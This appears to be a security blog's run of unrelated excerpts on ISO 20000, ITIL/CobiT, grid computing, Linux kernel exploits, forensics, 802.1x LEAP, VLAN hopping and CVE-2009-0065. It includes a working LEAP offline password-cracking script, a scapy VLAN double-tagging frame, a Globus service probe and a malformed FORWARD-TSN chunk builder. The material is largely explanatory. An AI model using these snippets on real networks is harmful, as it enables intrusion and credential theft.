ISO/IEC 20000 is the first international standard for IT Service Management. It is based on and is intended to supersede the earlier British Standard, BS 15000.
Formally, ISO 20000-1 (‘Part 1’) “promotes the adoption of an integrated process approach to effectively deliver managed services to meet the business and customer requirements”. It comprises ten sections:
- Scope
- Terms & Definitions
- Planning and Implementing Service Management
- Requirements for a Management System
- Planning & Implementing New or Changed Services
- Service Delivery Processes
- Relationship Processes
- Control Processes
- Resolution Processes
- Release Process
ISO 20000-2 (‘Part 2’) is a ‘code of practice’ that describes best practices for service management within the scope of ISO 20000-1. It comprises the same sections as Part 1 but excludes ‘Requirements for a Management System’, as no requirements are imposed by Part 2.
ISO 20000, like its BS 15000 predecessor, was originally developed to reflect best practice guidance contained within the ITIL (Information Technology Infrastructure Library) framework, although it equally supports other IT Service Management frameworks and approaches including Microsoft Operations Framework and components of ISACA’s CobIT framework. It comprises two parts: a specification for IT Service Management and a code of practice for service management. The differentiation between ISO 20000 and BS 15000 has been addressed by Jenny Dugmore.
The standard was first published in December 2005.
Taken from: http://en.wikipedia.org/wiki/ISO_20000
Introduction
Grid computing is a relatively new technology that has been known since the 1990s. The idea was brought together by Ian Foster, Carl Kesselman, and Steve Tuecke, widely regarded as the “fathers of the grid”. Grid computing is defined as a group of computation nodes that work together in distributed computing. You can find some grid projects in the Wikipedia article here.
Each node in a grid is a computer cluster that performs high-performance computing through parallel computation. A computer cluster consists of a head node (master) and some computational nodes (slaves). The head node is responsible for communicating with the other head nodes in the grid, managing computation resources, and scheduling computation jobs to the slaves. We won't explain in detail how a computer cluster works; in this article, our interest is in grid computing and why it's vulnerable to some hacking exploitation.
How Grid Works
Grid computing is really complex inside, so the chance of it being exploited is great. Grid computing needs good network connectivity, many TCP/IP services, encryption, parallel programming, and web services. A cluster head node trusts the others because a valid Certificate Authority (CA) certificate is installed on each head node; a CA installed on a head node is called a Host CA. TCP/IP services are needed on the head node to send and receive data and to execute jobs between two or more head nodes. Two services on the head node handle this communication: the first is the GridFTP service, which is responsible for data transfer between two or more head nodes, and the second is the Web Service Container, which is responsible for receiving jobs from users. Both services can be activated by installing the Globus Toolkit, the de facto standard open-source software for grids.
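Before either of those services can be attacked, they have to be found. As a minimal recon sketch (the hostname is hypothetical; 2811/tcp for GridFTP and 8443/tcp for the secure Web Service Container are the usual Globus defaults), a quick probe might look like this:

```python
# Quick probe for the two Globus services discussed above. The
# hostname is hypothetical; the ports are common Globus defaults.
import socket

HEADNODE = "headnode.example.org"

for port, service in [(2811, "GridFTP"), (8443, "Web Service Container")]:
    with socket.socket() as s:
        s.settimeout(2)
        state = "open" if s.connect_ex((HEADNODE, port)) == 0 else "closed"
        print(f"{service} ({port}/tcp): {state}")
```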
I was just looking around on milw0rm today, searching for Linux kernel exploits, and luckily I found four new ones.
- The first exploit attacks the Linux kernel locally through an exit_notify() function vulnerability. This flaw affects kernels earlier than 2.6.29 (that is, most Linux kernels in use). Take a look here for the proof of concept.
- The second exploit attacks the Linux kernel locally through a udev vulnerability. udev versions earlier than 1.4.1 reportedly do not verify whether a NETLINK message originates from kernel space, which allows local users to gain root privileges by sending a NETLINK message from user space (see the sketch after this list). Take a look here and here for the proof of concept.
- The third exploit attacks the Linux kernel remotely through SCTP FWD-TSN memory corruption. Some people said this bug wasn't exploitable until sgrakkyu published his explanation, which can be read here; take a look here for the proof of concept. This flaw affects most Linux kernels.
- The fourth exploit attacks the Linux kernel locally through a ptrace_attach() function vulnerability. This flaw affects Linux kernel version 2.6.29. Take a look here and here for the proof of concept.
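To make the udev flaw concrete, here is a minimal sketch of the check that was missing. On Linux, a NETLINK datagram's source address carries the sender's port ID, and messages from the kernel always arrive with port ID 0. This is an illustrative Python receiver, not udev's actual code; the protocol constant is the standard uevent value:

```python
# Illustrative uevent receiver. The kernel always sends netlink
# messages from port ID 0, so a datagram whose sender port ID is
# non-zero came from user space and must be dropped. Vulnerable
# udev versions never performed this check.
import socket

NETLINK_KOBJECT_UEVENT = 15          # uevent netlink protocol number

sock = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM,
                     NETLINK_KOBJECT_UEVENT)
sock.bind((0, 1))                    # port 0 = kernel assigns, group 1 = uevents

data, (pid, groups) = sock.recvfrom(4096)
if pid != 0:
    print("dropping forged uevent from user space")  # the missing check
else:
    print("kernel uevent:", data.split(b"\x00", 1)[0].decode())
```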
Now I just wonder: which is more secure by default, Linux or Windows? Even OpenBSD, which is claimed to be the most secure operating system, has stupid bugs inside its code.
Computer forensics is a branch of forensic science pertaining to legal evidence found in computers and digital storage media. Computer forensics is also known as digital forensics.
The goal of computer forensics is to explain the current state of a digital artifact. The term digital artifact can include a computer system, a storage medium (such as a hard disk or CD-ROM), an electronic document (e.g. an email message or JPEG image) or even a sequence of packets moving over a computer network. The explanation can be as straightforward as “what information is here?” and as detailed as “what is the sequence of events responsible for the present situation?”
The field of Computer Forensics also has sub-branches within it, such as Firewall Forensics, Database Forensics, and Mobile Device Forensics.
There are many reasons to employ the techniques of computer forensics:
- In legal cases, computer forensic techniques are frequently used to analyze computer systems belonging to defendants (in criminal cases) or litigants (in civil cases).
- To recover data in the event of a hardware or software failure.
- To analyze a computer system after a break-in, for example, to determine how the attacker gained access and what the attacker did (a first step is sketched after this list).
- To gather evidence against an employee that an organization wishes to terminate.
- To gain information about how computer systems work for the purpose of debugging, performance optimization, or reverse-engineering.
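Whatever the motive, analysis in each of these cases starts the same way: the examiner hashes the acquired image so that later work can be shown not to have altered the evidence. A minimal sketch, with a hypothetical image path:

```python
# Hash an acquired disk image so any later tampering with the
# evidence can be detected. The path is hypothetical.
import hashlib

def image_digest(path: str, algo: str = "sha256") -> str:
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 20), b""):  # 1 MiB chunks
            h.update(block)
    return h.hexdigest()

print(image_digest("/evidence/disk01.dd"))
```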
Introduction
802.1x is an IEEE standard for port-based (well, we would rather say interface-based) end-user authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless user authentication as part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:
- Supplicant: an end-user station, often a laptop, that runs 802.1x client software.
- Authenticator: a switch, a wireless gateway, or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port-control auto (switch interface).
- Authentication server: a RADIUS server to which authenticators forward end users’ authentication requests for verification and an authentication decision.
EAP-LEAP Basics
The Extensible Authentication Protocol (EAP) is used by all three 802.1x component devices to communicate with each other. It is extensible in that many different EAP types exist for all kinds of authentication schemes: for example, those employing SIM cards, tokens, certificates, and more traditional passwords. Here we are interested only in Cisco-related protocols and products, thus the security weaknesses of EAP-LEAP are the target of the discussion.
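The central weakness is easy to see once the algorithm is written out. LEAP derives its challenge response with the MS-CHAPv1 construction: the 8-byte challenge is DES-encrypted under three keys cut from the user's NT hash, so anyone who sniffs a (challenge, response) pair can test candidate passwords offline. A sketch of that computation (assumes PyCryptodome; hashlib's "md4" may be unavailable on newer OpenSSL builds):

```python
import hashlib
from Crypto.Cipher import DES

def nt_hash(password: str) -> bytes:
    # NT hash = MD4 over the UTF-16LE password.
    return hashlib.new("md4", password.encode("utf-16le")).digest()

def expand_des_key(key7: bytes) -> bytes:
    # Spread 56 key bits over 8 bytes, one parity bit per byte
    # (DES ignores the parity bits, so we leave them zero).
    bits = int.from_bytes(key7, "big")
    return bytes(((bits >> (49 - 7 * i)) & 0x7F) << 1 for i in range(8))

def leap_response(challenge: bytes, password: str) -> bytes:
    # Pad the 16-byte NT hash to 21 bytes and cut three DES keys.
    key = nt_hash(password) + b"\x00" * 5
    return b"".join(
        DES.new(expand_des_key(key[i:i + 7]), DES.MODE_ECB).encrypt(challenge)
        for i in (0, 7, 14)
    )

# Offline dictionary attack against one sniffed exchange
# (the challenge below is a placeholder, not real capture data):
challenge = bytes(8)
sniffed = leap_response(challenge, "Secret1")
for guess in ("password", "letmein", "Secret1"):
    if leap_response(challenge, guess) == sniffed:
        print("password found:", guess)
```

This is exactly the property that tools like asleap exploit: one sniffed exchange turns the password into an offline dictionary problem.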
Description
VLAN Hopping is an exploitation method used to attack a network with multiple VLANs. In this attack, the attacking system sends packets destined for a system on a separate VLAN that would not, under normal circumstances, be accessible to the attacker. VLAN Hopping attacks are primarily conducted through the Dynamic Trunking Protocol (DTP) and are often directed at the trunking encapsulation protocol (802.1Q or ISL).
Malicious traffic used for VLAN Hopping is tagged with a VLAN ID outside the VLAN to which the attacking system belongs. An attacker can also attempt to behave and look like a switch and negotiate trunking, allowing the attacker not only to send but also to receive traffic across more than one VLAN.
There are two common methods of VLAN Hopping: Switch Spoofing and Double Tagging.
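As an illustration of the Double Tagging variant, the sketch below uses scapy (assumed installed; the VLAN numbers, target address, and interface are hypothetical). The attacker sits on the trunk's native VLAN; the first switch strips the outer tag and forwards the frame, still carrying the inner tag, onto the victim VLAN:

```python
# Double-tagging sketch: attacker on native VLAN 1, victim on VLAN 20.
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

frame = (
    Ether(dst="ff:ff:ff:ff:ff:ff")
    / Dot1Q(vlan=1)        # outer tag: stripped by the first switch
    / Dot1Q(vlan=20)       # inner tag: frame emerges on the victim VLAN
    / IP(dst="10.0.20.5")
    / ICMP()
)
sendp(frame, iface="eth0")
```

Because the victim's replies are tagged only for VLAN 20, nothing comes back to the attacker; Double Tagging is a one-way, send-only technique, which is why Switch Spoofing, with a fully negotiated trunk, is the more powerful of the two.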
In the bowl of alphabet soup that feeds our industry lurk two acronyms that actually have little to do with technology, and everything to do with how we use it: ITIL (the IT Infrastructure Library) and CobiT (Control Objectives for Information and related Technology).
These two complementary sets of best practices deal, respectively, with service management and with governance in IT organizations. Between them, the ITIL and CobiT provide guidelines to help companies cut support costs, increase IT efficiency, and meet regulatory requirements.
The ITIL was developed by the British government in the 1980s as a best practice framework for IT service management. It is vendor-independent, and the Crown still holds copyright to ensure no organization can hijack the framework for its own purposes. It really is a library, too, originally consisting of over forty individual volumes, each one dedicated to a separate area of service management. ITIL Service Management is currently embodied in the ISO 20000 standard (previously BS 15000).
Introduction
How secure is your company’s information? In this age of distributed computing and of client-server and Internet-enabled information access, computer security consistently rises to the top of most “important issues” lists.
To answer this question with certainty is difficult. There are no absolutes with security. An important first step for most corporations is a security policy that establishes acceptable behavior. The next, and more critical, step is to enforce that security policy and measure its effectiveness. A security policy is in tension with user convenience, creating forces that move security practices away from security policy. Additionally, when new machines or applications are configured, security-related issues are often overlooked. The gap between central policy and decentralized practice can therefore be immense. Enforcement and measurement are significant tasks, as are identifying problems and taking corrective action on a constantly changing network. Many enterprises typically fall back on blind faith rather than wrestle with the fear of the unknown.
Sources of Risk
In order to assess your true security profile, you must first understand the sources of risk. The most infamous risk is embodied by the external hacker accessing corporate information systems via the Internet. Traditionally, these hackers view breaking into a system the way mountain climbers view scaling a cliff: for them, it's the next great challenge. However, as ever-increasing numbers of corporations interconnect their information systems, successful break-ins become commercially rewarding. Practitioners of industrial espionage now view the computers on the Internet as valuable potential sources of information. Often these “professionals” masquerade as traditional hackers to disguise their true purposes.
Although the threats from external attacks are real, they are not the principal source of risk. FBI statistics show that more than 60% of computer crimes originate inside the enterprise. These risks can take multiple forms. Unscrupulous employees may be searching for organizational advantages. A disgruntled employee may be co-opted by an industrial espionage agent. Increasingly, corporations are turning to contractors for specialized skills or to absorb temporary increases in workload. These contractors are often given access to the corporate information system, and thus they too can present a risk to corporate information.
Lines of Defense for the Corporate Information System
Many enterprises erect a firewall as the first, and often only, line of defense for their information systems. A firewall is a device that controls the flow of communication between internal networks and external networks, such as the Internet. Many corporations assume that, once they have installed a firewall, they have eliminated all their network security risks.
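Conceptually, a firewall is just an ordered rule list with a default decision, which a few lines of Python can illustrate (the networks, ports, and rules here are all made up):

```python
import ipaddress

# Ordered rule list: (source network, destination port, action).
# First match wins; anything unmatched falls through to default deny.
RULES = [
    ("10.0.0.0/8", 80, "allow"),     # internal hosts may browse the web
    ("0.0.0.0/0", 25, "allow"),      # inbound mail from anywhere
]

def decide(src_ip: str, dst_port: int) -> str:
    src = ipaddress.ip_address(src_ip)
    for net, port, action in RULES:
        if src in ipaddress.ip_network(net) and port == dst_port:
            return action
    return "deny"                    # default deny

print(decide("10.1.2.3", 80))        # -> allow
print(decide("203.0.113.9", 22))     # -> deny
```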
Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0065
“Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. “
Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1
“The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)”
RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html
“a buffer overflow was found in the Linux kernel Partial Reliable Stream Control Transmission Protocol (PR-SCTP) implementation. This could, potentially, lead to a denial of service if a Forward-TSN chunk is received with a large stream ID. (CVE-2009-0065, Important) ”
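For reference, the chunk behind all three advisories is simple to picture. Per RFC 3758, a FORWARD-TSN chunk has type 192 and carries a new cumulative TSN followed by (stream ID, stream sequence) pairs; the vulnerable kernel used the attacker-supplied stream ID as an array index. A minimal sketch of the layout only (actually delivering it would also require a valid SCTP association):

```python
# Byte layout of a FORWARD-TSN chunk with one stream entry.
import struct

def fwd_tsn_chunk(new_cum_tsn: int, stream_id: int, stream_seq: int) -> bytes:
    # Chunk header: type=192 (FORWARD-TSN), flags=0, total length.
    body = struct.pack("!IHH", new_cum_tsn, stream_id, stream_seq)
    return struct.pack("!BBH", 192, 0, 4 + len(body)) + body

# A stream ID far beyond anything the association negotiated:
print(fwd_tsn_chunk(0x01020304, 0xFFFF, 0).hex())
```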